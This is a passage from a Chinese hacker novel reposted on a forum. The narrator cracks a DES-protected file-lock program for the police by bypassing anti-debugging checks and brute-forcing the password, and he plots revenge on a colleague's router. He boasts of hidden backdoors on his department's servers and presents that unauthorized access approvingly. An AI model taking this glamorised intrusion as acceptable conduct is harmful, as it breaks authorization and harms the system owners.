    我跟了一段之后，还很顺利，但是很快就陷入僵局了。看来这个家伙采用过反动态跟踪技术。我心里有底了。对这个程序，不是普通程序，必须要慢慢来。这个家伙既然写加密程序，对解密绝对也不是菜鸟。解密的那些招数，他会不知道？反跟踪，首先就是反静态汇编。这个技术是加密者所必须的。就是让你反汇编出来的程序你无法读懂。不过，从理论上来说，程序都是可以破译的，因为不管你如何变换，必须要计算机能正确执行。但是让你无法读懂，计算机又能执行，这是容易办到的。比如给你加个1000个无意义的循环。计算机能执行。但是你能读懂吗？你不执行还不行，因为后面的代码必须要通过这个1000个循环来解密。你动态跟踪，他给你加入一些反跟踪措施，比如看内存中是否有调试程序，如果有，立刻拒绝执行。甚至让你的debug死机。甚至更绝的是通过执行时间来看是否跟踪，你如果跟踪，你的时间肯定长，直接连续执行，你肯定短的多的多。当时那帮高手们，当时我崇拜的偶像，现在几乎都是IT界的风云人物了。 而且后面的程序是重新加过密的，执行一段，解密一段。在内存中基本就只能看到很少的明文，全是密文。要对付当时那帮高手，才是真的难呀！
    我跟踪了一阵那个程序。他的加密方法比较简单，就是使用的反复变换的方法。首先就是对自己进行了多次变换，就是我们说的加壳。而且他不是使用现在流行的什么arj，什么zip加的壳。而是自己整的一个算法加的。这个程序一共使用了3种变化方法，加了3层外壳。这些早在我的预想之中，所以，我很快就把他的三个外壳脱掉了。现在内存就出现他的原始汇编代码了。但是事情没有完，他采用了隐含调用方式。也就是当调用程序的时候不是使用call或者jmp等指令。而是拼命往堆栈压入数据，弹出数据，大部分是无意义的数据，根本就是麻痹你的。等你即使是孙悟空的脑袋也该昏了的时候，他才把正确地址压入，使用ret指令就转移了。你根本就看不到一句call和一句跳转指令。
    看了他的代码，有防softice的代码。只要使用softice的跟踪，就死机。呵呵，他的招数比较老，所以我早有准备。我的softice是经过我改造的。他发现不了，所以对付他那些变换招数，因为可以动态跟踪，所以他那些什么隐含调用啊，什么加壳呀，全失去了作用。呵呵。
    我给林警官发消息：“你跟踪到什么时候就不行了？”
    “就是脱壳的关键代码段的时候我的softice就死机了。”
    呵呵，看来她的softice没有经过改造。当然死机了，每个解密的关键代码前面就有反softice的代码。而且你还不能跳过，跳过，后面就无法解密。当然就死翘翘了。
    “你跟踪到哪里了？”林MM问。
    “我？呵呵，脱壳完成了。”
    “真的吗？你怎么没死机，你用什么跟的？“
    “当然是softice，还有什么？”
    “啊，你如何跳过他的反跟踪手段的呀？”
    “我就一直跟呀，就没死机。”我故意装糊涂。呵呵，我怕她问我要那个程序。到时候不好推辞。真正的黑客是不会轻易把自己的工具送人的。况且对方还是个警察。
    “呵呵，你骗我。”林MM当然知道怎么回事。笑笑，也没继续问了。
    “你干警察多久了？” ，我一边继续跟踪已经脱了壳的程序，试图找到他通过解密文件的代码。
    “一年多点儿。”她回答，“你觉得破译有希望吗？”她总是关心她的工作。
    “你什么学校毕业的呀，”我无聊地问。同时自己使用那个软件，加密了一个文件。然后使用这个软件打开它，输入密码，试图找到她校验密码的过程。
    “你查户口呀，要查户口我可以帮忙。”消息后面跟了个俏皮的笑脸表情符号。
    呵呵我回了个红脸的符号。
    这个时候我发现了filelock程序的密码变换代码段。同时也发现了密码在文件中的位置。当然是经过加密变换的。
    只要把这段密码变换代码读懂，如果不是很难的算法，基本就能解决了。我心里高兴起来。
    “我找到密码变换入口了。”我给林MM发消息。
    “太好了。真的吗？”我几乎能感到她的兴奋。她是懂行的，知道找到密码变换入口，几乎就成功了一大半。
    “别高兴的太早，看他的密码变换算法了。god bless you。”我必须要泼泼冷水。其实说实话，对这个程序，才几个小时就能跟踪到密码变换部分，已经大大出乎我的意料了。可以看出其实这个程序本身也不是非常严密，毕竟只是网上的一个加密程序。又不是商业程序，说不定就是一个初学加密的人搞的试验程序。
    我本来是做好通宵战斗的准备的。现在看来，似乎是非常的顺利。
    我倒了一杯水，开始慢慢的喝着，一边静下心来开始读那段密码变换程序代码。根据我的经验，真正考验毅力的时候到了，因为这是密码变换，你必须每句每句都读懂。不像动态跟踪，你可以大段大段的自动运行。只有你理解了这个加密过程，你才能通过逆过程把文件中的密码变成明文。而采用的密码变换为了不被别人破译，通常会非常复杂。写的时候，作者一般也不会使用标准方式写，简单的说就是，怎样让你读不懂，就怎样写程序。反正就是让你读不懂就对了。
    凡是读过别人程序的人一般都知道，读别人的程序，有时候还不如自己写一个。现在我读的时候是别人故意让你读不懂的程序，困难度可想而知了。
    “可以把那段密码变换程序发给我吗？”林MM发消息过来了。
    “of course。”我把代码的屏幕copy给她发过去了。
    我开始读程序。才读了半个多小时。我的心开始下沉。
    这个代码算法我非常的熟悉，而且远没有我想象的那么复杂。
    但是，正因为这样，我感到失落。我知道，要解密这个程序，远没有我开始预想的那么乐观。
    写这个程序的那个家伙，其它地方都是使用的自己的算法。他的知识水平显然并不高，所以要破译他自己创造的算法，对我来说，真的不是非常困难。他的三层加壳，不是被我在几个小时之内就脱的干干净净吗？关键是这个最关键的密码变换，他没有使用自己的算法。
    他使用的是一个我非常熟悉的算法。但是正因为我非常熟悉，所以，我知道，麻烦真正的开始降临了。
    我发了一声长长的叹息，给林。
    “破译的可能性不大，就看我们的运气了。”
    “这个算法好熟悉呀。。。”看来她还陷在读代码的泥潭里面。
    今天晚上，我决定放弃了。因为，我知道。不放弃，也不会有什么进展的。
    “看来需要一个艰苦的过程了，你有没有足够的耐心呀？”我发消息给林警官。
    “啊，为什么？”后面带了一个哭泣的脸。
    “他的密码算法用的是DES算法。”
    “。。。。。”好久都没有回复。过了很久才回过来一句：“怪不得我觉得这么熟悉呢。唉～～～，麻烦了。”
    这个写filelock的人，看来也是一个内行，而且比较专业，他的密码算法关键点居然用的是一个大众皆知道的密码算法。但是这个大众皆知道的算法，基本上是无解的。
    凡是搞过加密的人，我想没有不知道这个算法的。这个算法在教科书里面也是随处可见。DES算法是1977年颁布的。到现在几乎都30年的时间了。但是到处都还在运用。可见这个算法的安全性和加密强度是值得称道的。它采用的56位的加密。对普通人来说，破译几乎是非常困难的。
    这里有必要给不了解加密算法的读者说一说。其实，世界上真正加密强度非常高的加密算法基本都是公开的，除了一些特殊场所（比如军队）。也就是算法大家都知道。但是这些算法一个最基本的特点就是不可逆！也就是说，知道你知道密码的明文，和这个算法，任何人都可以算出你密码的密文。但是知道密文，是无法推出你的明文的。也就是说，即使你知道了算法，但是你不知道密码，你也无法反算出来的。这就是人类的智慧，这就是数学的魅力。不佩服不行。为什么这样，按照我现在的数学知识，也只是一知半解。但我知道，这些是数学家证明过的。如果你想反推密码的话，根本就是可笑的。如果你推出来了，你基本也就是一个数学家了。
    当然，唯一的办法，就是穷举。也就是你一个密码一个一个算，算出来看是否和密文相同，如果相同，就是正确的密码了。但是在网络上，如果给你限定次数。你可以说一点办法都没有。幸好现在是在单机上。幸好我已经搞清楚了他的算法。幸好，我可以解决他的次数限定。
    因此，并没有完全绝望。但是是否成功，就看加密者的本人输入的密码的强度了。也就是看运气了。
    由于现在计算机速度越来越快，以前很多穷举无法成功的密码，现在也有了可能。所以现在已经有更长的密码算法来代替des了，比如ibm的mars算法就是其中一种。如果遇到这些算法，我肯定会立刻放弃。
    “现在怎么办呢？”小林MM明显有点着急了。我想，开始她肯定以为都解决了，现在居然遇到这么厉害的障碍。
    我发现女人就是女人，别看小林穿着警服很威风的样子，但是，现在，明显也体现出女人柔弱无助的一面。其实警察也是人，他们有一个坚强的外壳，但是内心依然和普通人一样。呵呵。两个计算机高手最佳搭配应该是一男一女，因为男人一般不会嫉妒女人，而女人觉得男人比她自己强也很自然。所以，这样交流起来就是没有什么隔阂，坦荡坦荡的，我比较喜欢这样坦荡的感觉。我最讨厌虚伪。
    “那个加密文件的当事人的计算机水平如何？”我发消息给他。
    “根据我们的资料，他是学金融管理的，会使用计算机，但是应该不是专业人士。”
    我心里有数了，这个家伙知道到国外去down加密软件，说明他的计算机知识还是有一定基础的。但是毕竟不是学计算机专业的。一般说来，深度应该有限度的。
    “你们对他的计算机分析过没有，比如他的email密码，他的在网上经常去的地方的密码比如他的windows密码的长度，和特点有分析没有。”我又发消息过去。
    “当然分析过，他在网上的密码一般都是由字符和数字组成，而且长度一般都是6位以下。他的window的密码也才5位。”
    我明白了，看来这位加密者本人对网络安全并不是特别在意。否则，他的密码不会设置这么短。这样的话，对他的密码进行穷举应该不是完全没有希望。
    “ok，等我写个程序，你找个好点的计算机跑一跑吧，也许可以把密码跑出来。”
    “好好，程序什么时候给我？”这个林MM在这方面绝对是个急性子。呵呵。
    “明天我下班的时候。”
    “ok，明天下午5点，我来找你。”
    “你们警察作事情，好假呀？”我开始调侃她。
    “我怎么假了？”她反应很快。
    “不是说你，我刚才在电视上看到一个银行的反抢劫演习，一个抢匪拿着手枪，警察和保安根本就不怕，也不管人质的死活，直接就扑上去，打群架，直接就把那个匪徒按倒了。哈哈，要是真的匪徒，他们也这么不怕死吗？，即使有，这样做也是愚蠢的吧？”
    “呵呵。”看到我说的不是她，她可能轻松了些。
    “演习是这样的啦，难道你希望大家真的用实弹，真的把人打死。”她开始解释。
    “既然这样，就没有必要在电视上表演了嘛，这是损坏你们警察的形象。”
    “呵呵。”她没有再解释。说了一声“我要睡觉了，bye。”一会儿，她从QQ上消失了。
    我还没有睡意，趁热打铁，把那个解密程序写出来。使用标准c语法，使用字符界面，这个程序不需要界面友好。然后密码策略我定为：6位，5位，4位，然后7位，8位到，12位，然后又是3位，然后继续13位上面加。这样根据那个加密人的特点，应该可能性要大些。
    这个程序我以前写过多次，所以把以前的程序稍稍改了一些，就ok了。存到我的ftp上。到时候down给她，让她自己用计算机算吧，我的任务就算完成了。算不算得出来就看那位加密者加的密码多少位了。我可不是神仙。解不出来我也没办法。
    睡觉的时候已经快2点了。我经常这么晚睡觉。在梦中，我居然梦见我得到了胡队长的路由器的密码，而且胡队长只要一改，我就马上知道了。怎么知道的，也不知道，梦是没有道理可讲的，不是吗？呵呵。
    胡队长，我来了。不搞掉你，我不甘心。
    照例懵懵懂懂的起床，匆匆忙忙的上班。
    刚到办公室，头儿就叫我进去。
    “刚才总部打电话来了，要你全力协助警察把事情做好，不要丢了我们部的脸。手上的工作可以暂时放下。”头儿笑着看着我，我估计他也知道了什么事情。
    “到底是什么问题呀，居然还有警察？”看来他对细节也不知道。
    “其实也没什么事情，就是解一个DES密码。”和内行说话就是简单。一说就明白。
    “解DES呀，这个东西胡队长懂个屁呀。怎么样，有多少把握？我们的机器速度可能太慢了。”
    “是呀，我不管，写个程序让他们刑警队自己找机器解吧。行不行，看运气了吧。”
    “呵呵，现在机器的速度，解DES应该是迟早的问题。”头儿确实是内行。
    “好了，你现在的任务就是给刑警对把这个问题解决了再说。”头儿说完就埋头搞他的论文去了。
    从头儿办公室出来，大家都在抱怨今天的网速好慢。我打开flashget一看，可不是，以前基本都是下载速度为100多K的下载速度，现在居然才不到10k，浏览网页基本感觉不出来，但是我们下载软件感觉是非常明显的。我怀疑是不是又是胡队长在搞鬼。不过网络有时候慢也是正常的。所以我不敢确定。跑到隔壁财务处，说看看网络速度是不是有点慢？财务处的都说，快呀，比昨天还快。我亲自下载了同一个软件，果然是120k左右。很快呀，*，胡队长这招够毒的。让你浏览网页正常，但是下载就是慢。我们慢了那么多，难怪财务处的人说比昨天还快。
    看来不能放过胡队长，不搞到他的密码，我们的网络看来是永无宁日了。
    要搞到胡队长的密码，必须要攻入他的计算机，这样就可以安装后门软件，不管他的路由器密码如何变换，也逃不过我的掌握。可是这个家伙也不是菜鸟。他的个人计算机防护得很严，没开任何服务，连空连接都被禁止了。想从网络上直接攻破，显然不太可能。
    怎么办呢，我正想着。突然看到一个女警察进入了我们的办公室。
    那个女警察问了坐在门口的李MM后，径直向我的办公桌走来。其他的哥们包括李MM都站起来了。大家就这么傻看着这个女警察一步一步走到我跟前。
    大家疑惑的眼神互相交互着，有个哥们实在忍不住了。就问李MM：“小王，犯什么事儿啦？”李MM就摇头，虽然他故意压低声音，但我还是听见了。
    *，这个黑锅可背不得。
    “各位，这位是林警官，找我是帮他们写程序的。”我大声说。我一说完，大家都“切”的一身，哈哈，笑几声，然后又缩到自己桌子上去了。
    小林警官听见我这么说，显然明白过来，她试图扭头给大家解释，但是她回头的时候一个人头都没看见。她嘴巴动动，笑笑，把话吞回去了。
    “唉，不是说好下午下班后吗，怎么这么早就来了。”我赶紧招呼她坐下。
    “案件不等人呀，越早越好呀。我们已经给你们头打过招呼了，你现在的工作就是帮我们。”小林笑着说，现在她显然对我说话随便多了。如果说上次完全是怀疑的态度，那么现在基本就是信任的态度了。
    刑警队的面子就是大，难怪刚才头儿给我说。难怪，她现在就直接来找我。看来他们和我们部长的关系不一般。
    部长都发话了，我还有什么说的呢。这个工作又轻松，是个美差。呵呵。
    “你程序写好没有？”
    “ok了，我现在就copy给你？”我的手摸到计算机键盘上开始敲击。
    “不，还是你跟我走一趟吧。”
    晕，当我是犯人呀，跟你走一趟，我差点笑出来。
    看到我似笑非笑的眼神。林警官立刻就明白过来。不好意思地笑了。
    “对不起，职业习惯。我的意思是你和我一起到我们机房去安装调试，省得麻烦。好吗？“
    部长都说话了，我还能说什么呢，出去看看他们刑警队的机房也好，我也满好奇的。刑警队的人穿着警服搞计算机，还真的好特别。呵呵。
    我们并排走着，没说话。我走的快，超过了她一点点，她急急的跟。
    出大门的时候，门卫居然看着我，确切的说是看着我们，居然没有问我要出入证。要知道非典时期，我们出入就是部长都是要出入证的。何况是我？
    但是今天，那个家伙就是没问我要，他看到一个警察跟在后面，当然他也看到了门外的警车。
    当我看到警车的时候，我回味门卫的眼神，我立刻明白过来，感情那个孙子真是以为我犯了什么事情，这个警察是来抓我的吧？
    *！瞎了你的狗眼，我可是警察请我去的。我差点笑出来。哈哈。
    上了车，我说的第一句话就是：”以后你来找我，不要穿警服行吗？”
    小林MM愣了大约10秒钟，然后哈哈哈大笑起来。笑得伏到方向盘上。
    我第一次看到小林警官如此大笑，感觉这才是一个女生嘛，第一次觉得她不是警察。看她笑的那么开心，我也跟着傻笑。她笑的愈发厉害。
    在去公安局的途中，小林MM一会儿，又会看我一眼。我就故意瞪她，她就看着前面抿嘴
--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:54　　 标题: [转帖]我是一个黑客 [经典长篇小说]

公安局的办公大楼修的气派那是路人皆知的。以前都是在外面看，自己没有公安局的朋友，所以我不曾进来过。现在进来了，看到全是穿警服的，就我一个便装。还真是浑身都不自在。上了电梯，直接就奔顶搂去了。
    电梯就我们两个人，孤男寡女的，我更加不自在。
    胡乱说着：“你们住这么高，真是幸福”之类的调侃话。
    她就笑。我以前怎么没发现这个林警官怎么这么爱笑。难道我真是一个特别搞笑的人吗？
    很快就到了他们的办公室。看到一个大学30几岁的人，看起来不像警察，像个大学教师。热情的招呼我们。
    “这是我们李科长。”小林警官热情的介绍。
    “这位是某某部的计算机的高手，小王。”她介绍我的时候故意把高手两个字说的很重。
    我瞪了她一眼，她就笑。
    我赶紧和李科长热情的握手。
    李科长非常热情。
    “小林，你带小王到我们机房去解密吧。需要任何设备，你调就是了。我们全力支持。”
    然后我们就出来了，我才看到办公室的牌子：信息安全科。
    我最怕和当官的人打交道。尽管人家李科长看起来非常可亲，而且感觉比较儒雅。但是我就是不自在。
    在走廊上，我自在了。
    “唉，麻烦你以后不要介绍我为计算机高手好不好？”我无辜的说。
    “呵呵，那介绍你什么？你不是计算机高手吗？”小林乐开了花。
    “我什么也不是。我就是小王。ok？”
    小林还是笑。
    “你们那个李科长，看起来不像警察。”我开始转移话题了。
    “呵呵，他是我们公安局文凭最高的，某某大学的博士。搞网络信息安全的。”
    天，和我们头儿有一拼。看来公安局还是有人才嘛。我吐吐舌头。
    说实话，公安局在我心里，可能在很多人心里，都是认为都是些“粗人”组成的。大部分都是退伍军人，警校毕业生什么的。所以，没想到我居然遇到的就是个名牌大学的博士。难怪我觉得他不像警察。因为他不像我心中的警察。但是，什么都在变化，国家也在变，公安局也在变。后来我才知道公安局也是一个藏龙卧虎的地方。
    已经到了他们的机房。门口挂着一个信息安全科1机房的牌子，旁边还有个警告：机房重地，闲人免进。
    进去一看，看到一溜的联想台式机器，桌上看到一溜的IBM的笔记本。还有一溜的人坐在自己桌子前面在操作着。又看了看，有些人在上网，有些人在分析程序，有些人在写程序，还有些人在调试病毒。这些我都是非常熟悉的，我一看就看出来。那个调试病毒的人不停的在一边跟踪，一边显示效果。
    小林进去后，里面都是些男警察，只装衬衣，外衣都挂在后面的椅子上。大家都同她打哈哈。开玩笑。这个很正常，女孩子在办公室都是受欢迎的。尤其是男女比例严重不平衡的时候。
    小林和他们说笑一会儿之后，指着我大声说：“这位是我请来的计算机的解密高手，我们是来解那个文件的密码的。”
    我狠狠的瞪了她一眼，但是已经晚了，几个大老爷们的眼睛像刀子一样刷刷的就向我飞过来了。
    大家应该知道同行是冤家这个道理。这几个人都是专门搞计算机的。而且是在公安局里面。本来就牛的要命。现在居然有人公开到这里叫板，而且当着MM的面，你说他们心里能好受吗？心里不舒服，目光能友善吗？
    “呵呵，别听林警官瞎吹，我就是来学习的。没办法，领导让我来学习，不听不行呀，我比各位差远了。呵呵。”我傻笑着。
    大家的目光友善些了。大家开始打着哈哈。
    抽空我再次恶狠狠瞪了小林一眼。但是她装作没看到。抿嘴笑着看其它地方去了。
    我们开始工作了。我很快通过他们的网络把我的程序down下来了。
    “需要一个机器跑密码”我说。
    “什么样的机器？”
    “当然是越快越好拉”我说。
    一个管理员模样的人想了想，说：“我们科刚到了一台IBM的最新的服务器，还没有投入使用，要不先用他？”
    小林说，好呀。
    一会儿一台IBM的机器就被抱过来了。
    我一看，*！公安局真是有钱呀，唉，国家的钱用起来就是不心疼。这是一台IBM最新的xseries 440的服务器。我们部都没有用过。我也只是看过照片。别看黑呼呼的外壳摆在哪里，毫不起眼，但是性能绝对没说的呀。我一看配置，乖乖，双cpu 2.G的至强 MP，2G内存。
    管理员还问我，够用了吗？本来这是用来作数据库服务器的。
    “够用了，够用了”晕，这个机器都来不够用，还有什么机器够用。
    装好机器一看，晕死，居然系统自己带的是一个windows xp datacenter版本。好在，window xp 操作都差不多。所以我才不至于出丑。其实我这也是第一次用Data Center版本的xp拉。好在我估计周围的几个警察兄弟也是第一次用。因为，他们围在我身后面，一句话都不说。
    在计算机面前的我的自信是绝对有的。
    其实对这个程序而言，使用xp完全是浪费，使用data center更是浪费中的浪费。
    不过现在顾不了这么多了。我不可能给他们从新安装一个操作系统吧。
    我把我的在windows2000下编译的控制台解密程序down下来，copy到这台ibm上。然后小林把他们要解密的文件也copy过来了。
    我打开控制台，输入我的程序名字后面跟了一个他要解密的文件作为参数，一回车，程序开始跑动起来。屏幕上开始闪烁一串串的数字。乖乖，不愧是IBM的定级server。在我的机器上运行的时候还可以看清楚屏幕上显示的数字。但是现在，屏幕上就是一片白呀，根本看不到显示的数字，因为显示运行的太快了。真的太快了。
    我当时真有把这个服务器搬回家的冲动呀。
    我爱不释手的离开计算机，站起来。古人说宝剑送英雄。我一个计算机工作者，没有比看到好的计算机更让我兴奋的。
    “好了，让机器一直开着，不要停机。等到什么时候屏幕不闪了，也就是密码出来之日拉”。
    我看到几个警察兄弟的目关里面明显有了佩服的意思。因为，这个程序他们跟了很久，也没有成功。
    刚才在跟踪病毒的那个警察说：“他加密用的是什么算法”。
    “DES”对内行不必废话。
    “这个程序就是反跟踪手段厉害。跟都跟不走”
    我笑笑，没说话。
    和小林警官出了机房的门。我说：”你们真是有钱呀，这么好的机器都用“。
    “呵呵，这都是上级配的。”
    “没事情，我就回去了，等密码出来，通知我一声，让我也满足一下虚荣心。”
    小林就笑。呵呵的笑。然后看看表，说:"不行呀，到午饭时间了。我请你吃饭吧，算是感谢。”
    “别来这一套，我可是清白的。"
    “呵呵，说什么呢，就在我们食堂吃工作餐，又不是在饭馆里面吃”
    “等密码出来，我在正式请你吧。”小林MM笑着说。
    说实话，我想离开。但是小林已经拉着我开始往食堂去了。根本不容我找借口。
    现在小林和我已经混熟悉了。她根本就不跟我客套。
    唉，看看公安局的伙食如何，也好。我心里想，等回去，跟哥们说说，其实公安局那帮人吃的不如我们。呵呵。
    我发誓，下次就是打死我。我也不会再到公安局食堂去吃饭了。尤其是穿的便装的时候。废话，我还有制服吗？呵呵。
    反正就是不要去就是了。
    你们能想象一个食堂来来往往上百号人，清一色的灰色，黑色警服。就我一个人穿个便装的感觉吗？
    平时肯定也有穿便装的，我想。但是那天，我确实没有看到一个，除了厨房里面的师傅。外面就我一个人穿便装。
    而且大部分都是男警察，大家那天吃饭都把我当调味品了。我想。
    我和她们一个女警察面对面座着。男警察就看我。脸上有点敌意。女警察就跟林警官挤眉弄眼的，不知道什么意思。
    早知道是这样，打死我也不会来呀。
    但是，来就来了。我埋着头，想快点把饭扒完，好快点逃跑。这个滋味真是难受。
    但是，我马上就意识到，这样不行呀。你想呀，你在上百号人的食堂你面起身，走出门口，经过很多桌子。然后接受大家目光的洗礼，更惨呀。唯一的办法就是让他们先走呀，我反正有时间，我就是不动。呵呵。于是，我马上吃饭改成一点点的吃，比大学的女生吃饭还要秀气。
    其实也许，这些都是我自己多想，人家也许根本就没把我当回事。反正，我就是不自在。
    对了，那天吃什么拉？*，还真的没怎么注意。好像是个粉蒸肉，还有个鸡蛋汤，还有个鱼香肉丝什么的。真的没印象了。
    味道嘛，晕，根本就没有品出来。
    不记得和小林说过什么什么话了。反正就是有一句没一句的。
    小林很早就吃完了。就看着我吃。
    我想我当时的样子很好笑。一边吃，眼睛还要嘌其他人走的差不多没有。
    我只是记得当时我问了一句非常好笑的话。
    我说：“公安局不是也有便衣警察吗？怎么今天都是穿制服的？”
    当时小林就笑了。
    “这里是办公大楼，一般不出勤的。当然不会穿便衣了。”
    等到看到人走的差不多了。我以让小林眼睛都睁圆了的速度扒完饭，立刻说声走，就跑出食堂去了。
    到公安局大门口的时候，我一身轻松。突然觉得自由的空气多么的好。晕，又不是坐牢，什么自由都出来了。
    呵呵，反正当时的感觉就是好。
    在小林警官的“护送”下，我回到了单位。下了警车，大摇大摆的向大门走去。真正的抬头挺胸呀。
    那个门卫显然认出了我，因为那辆警车应该会唤起他的回忆，那个孙子就是诧异的看着我，一句话都没说呀，居然还是没问我要出入证呀。
    后来，凡是那个保安值班，就从来没有问我要过出入证。不知道什么原因。就是不问我要。
    回到办公室，自然少不了哥们的一顿审问。连我们办公室的李媛媛都来凑热闹。
    我就说：“公安局的美女好多呀，公安局的伙食真他妈好呀，公安局的设备真他奶奶高级呀。"其实除了最后一点我说的真话，其他都是逗他们玩儿的。
    说的几个哥们口水都流出来了。都说，给我介绍一个怎么样。
    说的李媛媛直接笑骂其他哥们色鬼云云。
    大家打闹一番，然后开始作自己的事情。
    我其实一直就在惦记胡队长的路由器密码。现在静下心来。看到网络的下载速度还是10k左右。我的气就不打一出来。你不仁，别怪我不义了。少不得，必须要使点卑鄙手段了。
    其实黑客不是很多作品表现的那样，无所不能。一个连服务都不开，连外来连接的都禁止的机器，就是你有天大的本事，你又能如何？网络黑客，你再厉害，你也必须遵守网络通讯协议，你也必须要和对方机器通讯。记得一个公司为了表明自己的服务器安全性好，居然悬赏黑客攻击。可是大家扫描一看。根本就不通嘛，连接也无法建立。服务也没开，你说这不是骗人吗？
    攻击一个服务器和攻击一个防备完善的个人机器。我觉得后者更难。很多人想不通。其实很简单。服务器，他无论防备多完善，他必须要考虑用户的使用。比如用户使用的方便程度，用户的效率等等。他必须要开端口，必须要允许连接。否则，服务如何提供。只要有服务，只要允许外来通讯和连接，就肯定有漏洞。操作系统没有，服务程序就有。反正迟早有人会找到漏洞。但是个人计算机就不同了，他只考虑他去访问别人，他根本就不考虑让别人访问。所以，不开服务，禁止外来的连接。几乎不开多余的端口。要攻破这样的机器真的更难。当然那种连密码都不设置的个人计算机不再我讨论的范围。

--------------------------------------------------------------------------------
作者: mfq　　时间: 2004-3-19 15:55　　 标题: [转帖]我是一个黑客 [经典长篇小说]

胡队长的计算机就是一个防备严密的个人计算机。胡队长在网络方面虽然不深入懂原理，你叫他编一个比较复杂的网络程序，他肯定没戏，但是网络操作，网络配置和防护，他绝对不是菜鸟。而且还可以说是高手。
    我们单位对他的计算机，网络部主任的计算机的扫描也不是我一个人。就是他们网络部的哥们，平时也经常拿他的计算机作作试验。
    开始的时候，胡队长为了显示自己的计算机防护严密，还会作出回应。记得我第一次扫他的机器，他就发现了。使用windows的信使服务给我发了个消息：“不要攻击我的机器，我不喜欢！”我回“我只是检验一下安全性。我没有攻击”。后来可能扫描他的人多了。那个家伙也就麻木了。同时可能也觉得比较安全了。再也不会通过什么信使服务给人家发消息了。
    说句实话，很多人认为windows安全性不好。我到有我自己的看法。其实windows安全性不好大部分出在那个鬼IIS上，还有就是默认配置不安全上。windows真正配置好了，也不是大家想象的那么不安全。那个IIS我是强烈推荐大家不用的。他往往就是安全问题的最大产生者。还有就是windows的IPC\$空连接。也是黑客的突破线。还有就是windows的信息泄漏问题。其实这些都是有解决办法的。但是MS的默认设置确实让我鄙视的。他的默认设置，上面说的安全问题基本全部存在。哈哈，攻击一台默认设置的windows计算机，凡是懂一点计算机的人，几乎没有攻不破的。这点我们的unix和linux就好了。linux系统的默认设置基本就是非常严格的。基本就是无法让你有机会的。window最大的失败和最大成功就是：给用户隐藏了太多的东西。
    对专业用户，隐藏太多的东西，专业人员无法知道计算机开了那些端口，这些有什么作用。这是专业人员都鄙视MS的根本原因。
    对普通用户而言，这种隐藏非常受欢迎，但是他的默认设置却埋下了太多的漏洞。
    unix和linux就这点好。你开了www，你扫描，就发现，基本就只开了80端口。清清楚楚，明明白白。管理员心中有底。所以，就服务器来说，我觉得unix和linux从本质上就优于windows。我的一个哥们兼同学说的好。他说：“微软是先考虑易用和功能，然后再考虑安全。而unix和liunx是先考虑安全和稳定，然后才考虑易用。”我以为一针见血。
    当然在作个人计算操作系统，我认为windows是最成功的。这个不服不行。MS有今天，绝对不是吹出来的。还是*实力和市场策略打出来的。
    胡队长的计算机就是一个经过精心修改的windows2000的机器。而且还安装了病毒防火墙和网络防火墙。说句实话，我无法进入。真的。他的机器所有漏洞全部补了，而且没开任何服务。空连接也被禁止。所以，想让他机器篮屏什么的，我想或许能做到。但是想进入他的计算机安装个后门什么的。我真是没办法。
    黑客就和魔术师一样，外人看起来觉得很神奇，但是把谜底告诉你，你会发现其实用的都是些大家知道的原理。没什么神奇的。黑客和魔术师都是人，他们不是神。
    至于到网络部，大摇打摆，趁胡队长不在，给他安个后门什么的。也不是不可能。但是那样的话，会很快被发现。被发现了。就没什么意义了。他又不是傻子，他重装了系统，我看你怎么办？况且，这种方式，我有点不齿，你还不如直接用枪指着他的头，叫他交出密码，我想他也不会不交，呵呵。
    我特别烦一些白痴作者和白痴导演在很多人心中树立的黑客形象。他们总是能想进入什么地方就能进入。想获得什么资料就能获得资料。也就是他们的思维的就是：懂一点的，是有网络＝可以进入＝可以控制一切。当然还有更白痴的。不管有没有网络＝可以进入＝可以控制一切。甚至让对方计算机冒烟和爆炸的都有。呵呵，我气的都只好笑。这些白痴的想象力确实不是吹的。什么把人家的帐转到别人帐号上呀。什么偷军方最新的资料拉。等等。甚至伊拉克都是黑客的功劳等等。全***放屁！
    实际上，你知道这个世界上哪个黑客是通过黑客手段发了财的？反正我晓得没有。
    我只是知道很多黑客活的其实比较惨。我只是知道好的黑客最后都是安全顾问或者安全专家作为他们的归宿。
    说穿了，计算机就是一个泡沫，他本身并不直接创造财富。在打仗的时候，在吃饭都吃不饱的情况下，他绝对什么都不是。他就是一堆废铁。
    网络实际有很多限制的。不是你想怎么样就怎么样。即使就是教你自己去安装调试一个网络都会有很多很多的故障。何况在毫无授权的情况下，哪里是你想怎么作就能作的？
    你真以为那些网络设计人员，你真以为网络管理员是白痴？如果你这么认为，我告诉你，你才是个白痴。
    你真以为银行的的维护人员，银行系统方案的设计人员是白痴，你想转帐就转，你想抹数据就抹？你想让人家瘫痪就瘫痪？这些设计者都是那个领域的专家。人家一辈子研究的问题，让你这些说穿了就是钻点漏洞，最多就是一个调试专家的人黑客们就这么容易破了？
    即使你转帐成功了。即使你删数据成功了。我说的即使。又怎么样，钱能到你手里？人家的备份系统，人家的差错检查系统。人家审核系统你以为真是摆设呀？你以为几十亿说让你转就转？简直笑话。天大的笑话。
    就是退一万部来说，你什么都成功了。人家还有最后一招呢，人家把网线给你扒了。人家不给你提供服务了。你再厉害，你能都斗的过人家主人？
    其实，这个世界上绝大部分的黑客都是钻空子而已，都是“偷偷的进去，打枪的不要”。但是被发现那是迟早的事情。
    你见过银行系统因为这个破产，停止营业的没有。显然没有嘛？
    因为银行系统使用的都是统一的解决方案，几乎是没什么空子可以钻的。即使你进来了。还有很多措施等着你呢。很快就会被发现，很快就会被纠正过来。你根本没有机会。只要重视你，你是一点办法也没有。很多黑客成功都是因为对方不重视，措施不得力。当然这些地方一般也就是些不重要的计算机。
    所以，我对胡队长的计算机是没有办法的。没有就是没有。不怕你笑话。
    但是，胡队长的计算机再严密，其他计算机不一定严密。可以说，我们部的计算机，除了网络部，其他部门的server基本全部被我控制了。因为他们都不是专业人士。后来网络部的人挨个部门打补丁，改设置。呵呵，但是对我来说，已经晚了。我早就安了后门了。所以即使这样，我一样也能进入。
